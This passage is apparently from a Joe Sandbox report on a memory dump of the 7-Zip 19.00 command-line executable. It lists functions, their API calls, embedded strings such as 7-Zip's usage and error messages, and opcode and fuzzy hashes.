_CxxThrowException.MSVCRT ref: 00B5FFD1
_CxxThrowException.MSVCRT ref: 00B5FFF7
_CxxThrowException.MSVCRT ref: 00B6002B
free.MSVCRT ref: 00B600DF
free.MSVCRT ref: 00B600E7
free.MSVCRT ref: 00B600F5

Strings

Cannot find listfile, xrefs: 00B5FF12
Incorrect item in listfile.Check charset encoding and -scs switch., xrefs: 00B5FFDA, 00B6000E
The file operation error for listfile, xrefs: 00B5FF71

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$ExceptionThrow
String ID: Cannot find listfile$Incorrect item in listfile.Check charset encoding and -scs switch.$The file operation error for listfile
API String ID: 4001284683-1604901869
Opcode ID: 96405dd8fb92279f030b02bc931f9dc36b9c89402a3ea1ebc254a3a14f5713aa
Instruction ID: eacc87fc68c025fe5f6c7a57ebe09f787f693e07e99ac7b4fcf640228bbc31a2
Opcode Fuzzy Hash: 96405dd8fb92279f030b02bc931f9dc36b9c89402a3ea1ebc254a3a14f5713aa
Instruction Fuzzy Hash: B551D47232878592CA20EB16E8907AFB7A1F7967D4F400192EF9913B59DF7DC909CB00

Function 00B57524 Relevance: 16.4, APIs: 13, Instructions: 153COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B5756F
SetLastError.KERNEL32 ref: 00B5758E
free.MSVCRT ref: 00B5759A

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$ErrorLast
String ID:
API String ID: 408039514-0
Opcode ID: 56e310f5247428a7174e856c66c809f8f157f3f47fc266d476a18a669d8f27e7
Instruction ID: 3fd5c0f1e4f3889b67584a4f8f4e60bbfcdb6a2b010076a7d0ae71c3e191016c
Opcode Fuzzy Hash: 56e310f5247428a7174e856c66c809f8f157f3f47fc266d476a18a669d8f27e7
Instruction Fuzzy Hash: E851522235D90092DA20EF24F49176EA7A0EBD6792F5011D2BF9E43679DF68CD4ECB10

Function 00B93148 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 52COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00B93184
fputs.MSVCRT ref: 00B93194
fputs.MSVCRT ref: 00B931E1
fputs.MSVCRT ref: 00B931F1

Strings

WARNING, xrefs: 00B931DA
WARNINGS:, xrefs: 00B931BE
ERROR, xrefs: 00B9317D
ERRORS:, xrefs: 00B93164
= , xrefs: 00B9318D, 00B931EA

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: fputs
String ID: = $ERROR$ERRORS:$WARNING$WARNINGS:
API String ID: 1795875747-2836439314
Opcode ID: bfaef9fa8df0d205eec04fe16e9a27ef95300a9a3da73fd13572728b12155a0b
Instruction ID: 93e969093f27db96c3158934b750bf8b75b17cc21cedab1320513da779c8c8e8
Opcode Fuzzy Hash: bfaef9fa8df0d205eec04fe16e9a27ef95300a9a3da73fd13572728b12155a0b
Instruction Fuzzy Hash: 021179A6300951A6EF249F26E98536877A0F70AF85F488062CF5903A65DF3CDAA9C301

Function 00B965D0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 46COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00B965F8
fputs.MSVCRT ref: 00B96604
fputs.MSVCRT ref: 00B96614

Part of subcall function 00B96460: fputs.MSVCRT ref: 00B964B3

fputs.MSVCRT ref: 00B96643
fputs.MSVCRT ref: 00B96674
free.MSVCRT ref: 00B96680

Strings

, xrefs: 00B965F1
Memory =, xrefs: 00B9660D
MB, xrefs: 00B9663C

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: fputs$free
String ID: $ MB$ Memory =
API String ID: 3873070119-2616823926
Opcode ID: 07695d8419c59f003fa7f84926a4645375bf0ceb04becd9a3de262dbf0bc1305
Instruction ID: 676cc46c2f8f63787be85a6d60974eacf256c09ff206177cde8898f513ab7784
Opcode Fuzzy Hash: 07695d8419c59f003fa7f84926a4645375bf0ceb04becd9a3de262dbf0bc1305
Instruction Fuzzy Hash: E211EFA2205902D1EB10DF25E95436A3720F795BE5F449262EE6E437A9DF3CC599C700

Function 00B930CC Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 32COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00B930E7
fputs.MSVCRT ref: 00B93104
fputs.MSVCRT ref: 00B93114

Part of subcall function 00B52320: free.MSVCRT ref: 00B5237E
Part of subcall function 00B52320: fputs.MSVCRT ref: 00B523B8
Part of subcall function 00B52320: free.MSVCRT ref: 00B523C4

fputs.MSVCRT ref: 00B93132

Strings

WARNING, xrefs: 00B930F0
Open , xrefs: 00B930DD
: Can not open the file as [, xrefs: 00B9310D
ERROR, xrefs: 00B930F7
] archive, xrefs: 00B93125

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: fputs$free
String ID: : Can not open the file as [$ERROR$Open $WARNING$] archive
API String ID: 3873070119-2741933734
Opcode ID: f32defa99fa0ddd8f5ee8d7903e4695ca461ad93e2af0abed86e02622ffafdb7
Instruction ID: 22a0b633ca7b70f470ee579322c992860c86601d66a0c8471b123a42a1028846
Opcode Fuzzy Hash: f32defa99fa0ddd8f5ee8d7903e4695ca461ad93e2af0abed86e02622ffafdb7
Instruction Fuzzy Hash: 42F06D65301E06E1EE10DF26E8943A97361FB5AFD5F849022DE1E43360DF2CC689C314

Function 00B8EE5C Relevance: 15.3, APIs: 12, Instructions: 344COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B8EFB0

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 92278cdab0ad5069273e32549c2c9c770d2a5dfe6a62cd2ad7786a5c7567a585
Instruction ID: d26ab79908264d73b7b56ba26d7fd74430bbd4577c106b0cb70bad7ebc091937
Opcode Fuzzy Hash: 92278cdab0ad5069273e32549c2c9c770d2a5dfe6a62cd2ad7786a5c7567a585
Instruction Fuzzy Hash: 96E15732315B8196DB54EF26E49476EB7A0F789B84F0480A2EF8E97725DF38C859C700

Function 00B56F50 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 116threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00B56F6D
GetTickCount.KERNEL32 ref: 00B56F78
GetCurrentProcessId.KERNEL32 ref: 00B56F85

Part of subcall function 00B5339C: free.MSVCRT ref: 00B533D7
Part of subcall function 00B5339C: memmove.MSVCRT(00000000,?,?,00000000,00B510A8), ref: 00B533F2

GetTickCount.KERNEL32 ref: 00B57023
SetLastError.KERNEL32 ref: 00B5705C
GetLastError.KERNEL32 ref: 00B57086

Part of subcall function 00B56C84: CreateDirectoryW.KERNEL32 ref: 00B56CA8

Strings

.tmp, xrefs: 00B5703B
d, xrefs: 00B5709B

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: CountCurrentErrorLastTick$CreateDirectoryProcessThreadfreememmove
String ID: .tmp$d
API String ID: 3444860307-2797371523
Opcode ID: 855db8f89ad4192e1f7aaf537696d0c704f64e19782212e671a724ccd2b912be
Instruction ID: 18d41f82d372f391a92abec9f760f21ae3284d1bab09b9493269dfb34a2455eb
Opcode Fuzzy Hash: 855db8f89ad4192e1f7aaf537696d0c704f64e19782212e671a724ccd2b912be
Instruction Fuzzy Hash: 04311226358250D7DB209B26F88076DB3E1F794BD6F4841A2EF8687B60DF79C48AC701

Function 00B56B2C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 87libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00B56B4F
GetProcAddress.KERNEL32 ref: 00B56B5F
free.MSVCRT ref: 00B56C0C
free.MSVCRT ref: 00B56C17
free.MSVCRT ref: 00B56C25
free.MSVCRT ref: 00B56C30

Strings

CreateHardLinkW, xrefs: 00B56B58
kernel32.dll, xrefs: 00B56B48

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$AddressHandleModuleProc
String ID: CreateHardLinkW$kernel32.dll
API String ID: 399046674-294928789
Opcode ID: 0711bf2b160802de48a7ad8e62ea8a456af0d095c717e74070ad8e7392e23327
Instruction ID: 6fe7f79e3ab35e0590db4dc7a8721e746581350199a100f1cba13cbf2c6f82f3
Opcode Fuzzy Hash: 0711bf2b160802de48a7ad8e62ea8a456af0d095c717e74070ad8e7392e23327
Instruction Fuzzy Hash: A321C72331694141CE61EB25EC5176F6790EBC2BE2F8412E1BE9A97764DE28C84EC600

Function 00B5DEBC Relevance: 13.9, APIs: 11, Instructions: 168COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B5DF01
free.MSVCRT ref: 00B5DFEC
free.MSVCRT ref: 00B5E051
free.MSVCRT ref: 00B5E05C
free.MSVCRT ref: 00B5E072
free.MSVCRT ref: 00B5E07D
free.MSVCRT ref: 00B5E0A1
free.MSVCRT ref: 00B5E0A9
free.MSVCRT ref: 00B5E0D2
free.MSVCRT ref: 00B5E0DA
free.MSVCRT ref: 00B5E0E9

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 7aae74738ebb1fa26e9c45f1fe68a2e26c39cce5353d9637d771cf3076791eab
Instruction ID: 7f524bdf802cbc3c79b96dd703c0da1493c0a476ce408887dfbad27c98cb7559
Opcode Fuzzy Hash: 7aae74738ebb1fa26e9c45f1fe68a2e26c39cce5353d9637d771cf3076791eab
Instruction Fuzzy Hash: 0C519323316A4085CA25EF25E85136B67E0EBC6BE6B4802E5FF5E47795DF38C54ACB00

Function 00B62C58 Relevance: 13.6, APIs: 9, Instructions: 127COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B62DC0
free.MSVCRT ref: 00B62DC8
free.MSVCRT ref: 00B62DD9

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 4f627721fd3f548a9e12361352d12e7f0c520e4151b4dacedd918d3c46c14af4
Instruction ID: ab97063bba87443fb1e6d6684b0c7bd50a8fb73fd7957b3be94cbadcb809f228
Opcode Fuzzy Hash: 4f627721fd3f548a9e12361352d12e7f0c520e4151b4dacedd918d3c46c14af4
Instruction Fuzzy Hash: DF418E23716D8086DB30AF15E8C026D63A1F7897A5F5902B6EF5E27B14DB3CCC868B40

Function 00B85988 Relevance: 12.7, APIs: 10, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1faaf7df75186d5ae884903546cdcce3f308a231f1a81c91827175cf65db9ce
Instruction ID: f075f8b25fc81876c9774e183ef19f0b2b56367a08ab9ef9ed807fd8d5251fc3
Opcode Fuzzy Hash: e1faaf7df75186d5ae884903546cdcce3f308a231f1a81c91827175cf65db9ce
Instruction Fuzzy Hash: D091CE72206F4086CB20EF25E49075FB7E0F795B94F505296EE9A477A8DF78C889CB40

Function 00B813E8 Relevance: 12.6, APIs: 10, Instructions: 133COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B81569
free.MSVCRT ref: 00B81574
free.MSVCRT ref: 00B8157D
free.MSVCRT ref: 00B81588
free.MSVCRT ref: 00B81596
free.MSVCRT ref: 00B815BA
free.MSVCRT ref: 00B815C3
free.MSVCRT ref: 00B815D1
free.MSVCRT ref: 00B815DC
free.MSVCRT ref: 00B82D73

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: d553175bd705add0397085a2f68dee216f55efb8e0660d055bcfc610d1b73714
Instruction ID: 54176dfbeb5cb5c47c1f602d0757df726a20f346969fc28b19c3d1fc5c7df142
Opcode Fuzzy Hash: d553175bd705add0397085a2f68dee216f55efb8e0660d055bcfc610d1b73714
Instruction Fuzzy Hash: 6551496720AAC485C620EF2AE49079F77A5F786B85F045492DF8E63B24CF39C446CB04

Function 00B816B2 Relevance: 12.6, APIs: 10, Instructions: 125COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B817E2
free.MSVCRT ref: 00B817ED
free.MSVCRT ref: 00B817F6
free.MSVCRT ref: 00B81801
free.MSVCRT ref: 00B8180F
free.MSVCRT ref: 00B81838
free.MSVCRT ref: 00B81841
free.MSVCRT ref: 00B8184F
free.MSVCRT ref: 00B8185A
free.MSVCRT ref: 00B82D73

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 9943e524698941380e30c423019f5bc2cf16f063716f467c35492b6a2cf77687
Instruction ID: 0fa675fcf00d97f57429e481d23293e9b7e7fe28d28b011195cbec46f2e96c5b
Opcode Fuzzy Hash: 9943e524698941380e30c423019f5bc2cf16f063716f467c35492b6a2cf77687
Instruction Fuzzy Hash: E841CAB7306F8481CA24EB2AE49036A73A5F78AF95F4594A2DE4E53724DF38C496C700

Function 00B96A20 Relevance: 12.6, APIs: 10, Instructions: 59COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B96A33
free.MSVCRT ref: 00B96A65
free.MSVCRT ref: 00B96A6D
free.MSVCRT ref: 00B96A7D
free.MSVCRT ref: 00B96A89
free.MSVCRT ref: 00B96ABB
free.MSVCRT ref: 00B96AC3
free.MSVCRT ref: 00B96AD3
free.MSVCRT ref: 00B96ADF
free.MSVCRT ref: 00B96AEB

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 49e297252a2c8ca67cda62bdf5dff8c128a9f435b231509b57c7dc761cb252a3
Instruction ID: d227fd323a7e087a6e36bc8bac47011bc8e6771ead129b5ae25695434b637952
Opcode Fuzzy Hash: 49e297252a2c8ca67cda62bdf5dff8c128a9f435b231509b57c7dc761cb252a3
Instruction Fuzzy Hash: 9A114C2370388488CB11AF26DD513A92361EB86F95F1D81F1AF2D6B369DE24C8468750

Function 00B5FC9C Relevance: 12.5, APIs: 10, Instructions: 44COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B5FCBA
free.MSVCRT ref: 00B5FCC3
free.MSVCRT ref: 00B5FCCC
free.MSVCRT ref: 00B5FCD5
free.MSVCRT ref: 00B5FCDE
free.MSVCRT ref: 00B5FCE7
free.MSVCRT ref: 00B5FCF0
free.MSVCRT ref: 00B5FCF8
free.MSVCRT ref: 00B5FD00
memmove.MSVCRT ref: 00B5FD1E

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$memmove
String ID:
API String ID: 1534225298-0
Opcode ID: 37bd50d8d1977fdd302a0b82f53c3d6d511d758968c823be9149fe37c82b5d04
Instruction ID: f9c2ba24fb42387a62726a33d4a6a39086f40a64854fff0b68f73e22953073dc
Opcode Fuzzy Hash: 37bd50d8d1977fdd302a0b82f53c3d6d511d758968c823be9149fe37c82b5d04
Instruction Fuzzy Hash: 4F014823313D4492CA04EF26DE9126D7360FB86F9670441E2AF2E5BB65DF20D86ACB44

Function 00B86528 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 132COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B866B0

Strings

/, xrefs: 00B865EB
z, xrefs: 00B86594
a, xrefs: 00B86589
\, xrefs: 00B865E5

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID: /$\$a$z
API String ID: 1294909896-3795456795
Opcode ID: 92741b9c6097dc57a5422346ae12ec5673efaeb8d1b2f3031f7aecb4c5395baf
Instruction ID: 61aaddf34aae766e5c7d9db509cbf54c46f192cfe72394eb5167de1aedd7b0c8
Opcode Fuzzy Hash: 92741b9c6097dc57a5422346ae12ec5673efaeb8d1b2f3031f7aecb4c5395baf
Instruction Fuzzy Hash: CA41A092A0029899DB30FB61D4047F937E0F361BE4F8942A6DE95433B4FB7989D6D701

Function 00B9870C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00B98785
fputs.MSVCRT ref: 00B98795
free.MSVCRT ref: 00B987E7
free.MSVCRT ref: 00B987EF
free.MSVCRT ref: 00B98801

Strings

7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21, xrefs: 00B9877E
Usage: 7z <command> [<switches>...] <archive_name> [<file_names>...] [@listfile]<Commands> a : Add files to archive b : Benchmark d : Delete files from archive e : Extract files from archive (without using directory names) h : Calculate hash values, xrefs: 00B9878E

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$fputs
String ID: 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21$Usage: 7z <command> [<switches>...] <archive_name> [<file_names>...] [@listfile]<Commands> a : Add files to archive b : Benchmark d : Delete files from archive e : Extract files from archive (without using directory names) h : Calculate hash values
API String ID: 2444650769-4238946813
Opcode ID: 6a807e1f11532017a4cdd53ea1c09d8dec3d45ef8e00fbcf8e020d56cf8062a2
Instruction ID: 3b61992c8f8d3a73e3d70d06d017d00816bc87d56f3b652618678e8f47bf80f9
Opcode Fuzzy Hash: 6a807e1f11532017a4cdd53ea1c09d8dec3d45ef8e00fbcf8e020d56cf8062a2
Instruction Fuzzy Hash: C721936330668195CE30DB65F9803AAB3A1F786785F9844B1CA4D97718CF3CC889CB44

Function 00B9E3E4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00B9E3EF
GetProcAddress.KERNEL32 ref: 00B9E3FF
GetModuleHandleA.KERNEL32 ref: 00B9E413
GetProcAddress.KERNEL32 ref: 00B9E423

Strings

kernel32.dll, xrefs: 00B9E3E8, 00B9E405
FindFirstStreamW, xrefs: 00B9E3F5
FindNextStreamW, xrefs: 00B9E419

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: FindFirstStreamW$FindNextStreamW$kernel32.dll
API String ID: 1646373207-4044117955
Opcode ID: ac966f64d20482aa4fd5c134ec705327a834465029026a46f097207993e27cb5
Instruction ID: 1e323cbdba1a9558a94cdb8c16d640127597b19cb0db9e4cb4facd1989f01209
Opcode Fuzzy Hash: ac966f64d20482aa4fd5c134ec705327a834465029026a46f097207993e27cb5
Instruction Fuzzy Hash: CFE07E68642A0792EA44DF51F8A836433A0F759761F904025D60A83320EF7CC55AC700

Function 00B54F24 Relevance: 11.4, APIs: 9, Instructions: 111COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B54FB9
free.MSVCRT ref: 00B54FC1
memmove.MSVCRT ref: 00B54FDC
free.MSVCRT ref: 00B55033
free.MSVCRT ref: 00B5503B
free.MSVCRT ref: 00B55049

Memory Dump Source

